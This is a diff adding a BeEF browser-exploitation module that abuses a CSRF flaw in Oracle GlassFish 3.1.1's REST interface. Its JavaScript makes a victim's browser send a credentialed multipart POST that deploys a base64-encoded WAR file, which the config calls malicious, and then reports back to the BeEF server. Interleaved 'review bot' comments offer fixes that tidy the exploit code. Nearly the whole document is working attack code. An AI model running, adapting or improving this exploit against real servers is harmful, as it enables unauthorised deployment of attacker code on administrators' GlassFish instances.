diff --git a/modules/exploits/glassfish_war_upload_xsrf/command.js b/modules/exploits/glassfish_war_upload_xsrf/command.js
new file mode 100644
index 000000000..a7d2744ad
--- /dev/null
+++ b/modules/exploits/glassfish_war_upload_xsrf/command.js
@@ -0,0 +1,224 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// + +// This exploit is based on the PoC by Roberto Suggi Liverani - Security-Assessment.com +// For more info, refer to: http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html + + +beef.execute(function() { + var restHost = '<%= @restHost %>'; + var warName = '<%= @warName %>'; + var warBase = '<%= @warBase %>'; + + var logUrl = restHost + '/management/domain/applications/application'; + + //BEGIN Daniel Guerrero binary Base64-library +/* +Copyright (c) 2011, Daniel Guerrero +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + * Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + * Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + * Neither the name of the Daniel Guerrero nor the + names of its contributors may be used to endorse or promote products + derived from this software without specific prior written permission. 
+ +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL DANIEL GUERRERO BE LIABLE FOR ANY +DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; +LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND +ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ + +/** + * Uses the new array typed in javascript to binary base64 encode/decode + * at the moment just decodes a binary base64 encoded + * into either an ArrayBuffer (decodeArrayBuffer) + * or into an Uint8Array (decode) + * + * References: + * https://developer.mozilla.org/en/JavaScript_typed_arrays/ArrayBuffer + * https://developer.mozilla.org/en/JavaScript_typed_arrays/Uint8Array + */ + +var Base64Binary = { + _keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", + + /* will return a Uint8Array type */ + decodeArrayBuffer: function(input) { + var bytes = Math.ceil( (3*input.length) / 4.0); + var ab = new ArrayBuffer(bytes); + this.decode(input, ab); + + return ab; + }, + + decode: function(input, arrayBuffer) { + //get last chars to see if are valid + var lkey1 = this._keyStr.indexOf(input.charAt(input.length-1)); + var lkey2 = this._keyStr.indexOf(input.charAt(input.length-1)); + + var bytes = Math.ceil( (3*input.length) / 4.0); + if (lkey1 == 64) bytes--; //padding chars, so skip + if (lkey2 == 64) bytes--; //padding chars, so skip + + var uarray; + var chr1, chr2, chr3; + var enc1, enc2, enc3, enc4; + var i = 0; + var j = 0; + + if (arrayBuffer) + uarray = new Uint8Array(arrayBuffer); + else + 
uarray = new Uint8Array(bytes); + + input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); + + for (i=0; i> 4); + chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); + chr3 = ((enc3 & 3) << 6) | enc4; + + uarray[i] = chr1; + if (enc3 != 64) uarray[i+1] = chr2; + if (enc4 != 64) uarray[i+2] = chr3; + } + + return uarray; + } +} + //END Daniel Guerrero binary Base64-library + + if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) { + XMLHttpRequest.prototype.sendAsBinary = function(datastr) { + function byteValue(x) { + return x.charCodeAt(0) & 0xff; + } + var ords = Array.prototype.map.call(datastr, byteValue); + var ui8a = new Uint8Array(ords); + this.send(ui8a.buffer); + } + } + + function fileUpload(fileData, fileName) { + boundary = "HELLOWORLD270883142628617", + uri = logUrl, + xhr = new XMLHttpRequest(); + + var additionalFields = { + asyncreplication: "true", + availabilityenabled: "false", + contextroot: "", + createtables: "true", + dbvendorname: "", + deploymentplan: "", + description: "", + dropandcreatetables: "true", + enabled: "true", + force: "false", + generatermistubs: "false", + isredeploy: "false", + keepfailedstubs: "false", + keepreposdir: "false", + keepstate: "true", + lbenabled: "true", + libraries: "", + logReportedErrors: "true", + name: "", + precompilejsp: "false", + properties: "", + property: "", + retrieve: "", + target: "", + type: "", + uniquetablenames: "true", + verify: "false", + virtualservers: "", + __remove_empty_entries__: "true" + } + + + var fileFieldName = "id"; + xhr.open("POST", uri, true); + xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a file MIME POST request. 
+ xhr.withCredentials = "true"; + xhr.onreadystatechange = function() { + if (xhr.readyState == 4) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Attempt to deploy \"' + warName + '\" completed.'); + } + } + + var body = ""; + + for (var i in additionalFields) { + if (additionalFields.hasOwnProperty(i)) { + body += addField(i, additionalFields[i], boundary); + } + } + + body += addFileField(fileFieldName, fileData, fileName, boundary); + body += "--" + boundary + "--"; + xhr.setRequestHeader('Content-length', body.length); + xhr.sendAsBinary(body); + return true; + } + + function addField(name, value, boundary) { + var c = "--" + boundary + "\r\n" + c += 'Content-Disposition: form-data; name="' + name + '"\r\n\r\n'; + c += value + "\r\n"; + return c; + } + + function addFileField(name, value, filename, boundary) { + var c = "--" + boundary + "\r\n" + c += 'Content-Disposition: form-data; name="' + name + '"; filename="' + filename + '"\r\n'; + c += "Content-Type: application/octet-stream\r\n\r\n"; + + for(var i = 0; i< value.length; i++){ + c+=String.fromCharCode(value[i] & 0xff); + } + + c += "\r\n"; + return c; + } + + + function start() { + fileUpload(Base64Binary.decode(warBase),warName); + } + + start(); + +}); + diff --git a/modules/exploits/glassfish_war_upload_xsrf/config.yaml b/modules/exploits/glassfish_war_upload_xsrf/config.yaml new file mode 100644 index 000000000..c065be089 --- /dev/null +++ b/modules/exploits/glassfish_war_upload_xsrf/config.yaml 
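Review bot: In fileUpload the comma-chained assignment `boundary = "HELLOWORLD270883142628617", uri = logUrl, xhr = new XMLHttpRequest();` carries no `var`, so all three names are created as implicit globals on the page instead of function locals; declare them as `var boundary = "HELLOWORLD270883142628617";`, `var uri = logUrl;` and `var xhr = new XMLHttpRequest();`. Further down the same function, `xhr.withCredentials = "true"` stores a string in a boolean property — it only works by truthiness and should read `xhr.withCredentials = true;`. The `setRequestHeader('Content-length', body.length)` call targets a header browsers refuse to let script set, so it has no effect and can be dropped. In addField and addFileField the line `var c = "--" + boundary + "\r\n"` has no terminating semicolon and relies on automatic semicolon insertion before the following `c += ...`; add the `;` to match the rest of the file.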
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ glassfish_war_upload_xsrf:
+ enable: true
+ category: "Exploits"
+ name: "GlassFish WAR Upload XSRF"
+ description: "This module attempts to deploy a malicious war file on an Oracle GlassFish Server 3.1.1 (build 12). It makes advantage of a CSRF bug in the REST interface.
For more information refer to http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html."
+ authors: ["Bart Leppens"]
+ target:
+ working: ["FF","S","C"]
diff --git a/modules/exploits/glassfish_war_upload_xsrf/module.rb b/modules/exploits/glassfish_war_upload_xsrf/module.rb
new file mode 100644
index 000000000..a18ca8cd4
--- /dev/null
+++ b/modules/exploits/glassfish_war_upload_xsrf/module.rb
@@ -0,0 +1,32 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Glassfish_war_upload_xsrf < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'restHost', 'ui_label'=>'Host', 'type' => 'textarea', 'value' =>'http://glassfishserver:4848', 'width' => '400px', 'height' => '25px'},
+ {'name' => 'warName', 'ui_label' => 'Filename', 'value' => 'hello.war', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' },
+ {'name' => 'warBase', 'ui_label' => 'Base64 of exploit', 'value' => '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', 'type' => 'textarea', 'width' => '400px', 'height' => '800px' }
+ ]
+ end
+
+ def post_execute
+ content = {}
+ content['result'] = @datastore['result']
+ save content
+ end
+
+end
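Review bot: The `warBase` option in `self.options` appears to embed the entire Base64-encoded archive as its default `value` string inside the Ruby source (the 800px textarea height and the redacted value suggest a large blob), which makes the file impossible to review in diff form and ties the module to one fixed artifact; an empty default, or a default read from a separate fixture file at load time, would keep the source readable. As a point of style, `return [` ... `]` is redundant in Ruby since the method returns its last expression — drop the `return` and leave the array literal as the body. A one-line comment above `post_execute` stating what `@datastore['result']` holds at that point would also help, as nothing in this file shows where it is populated.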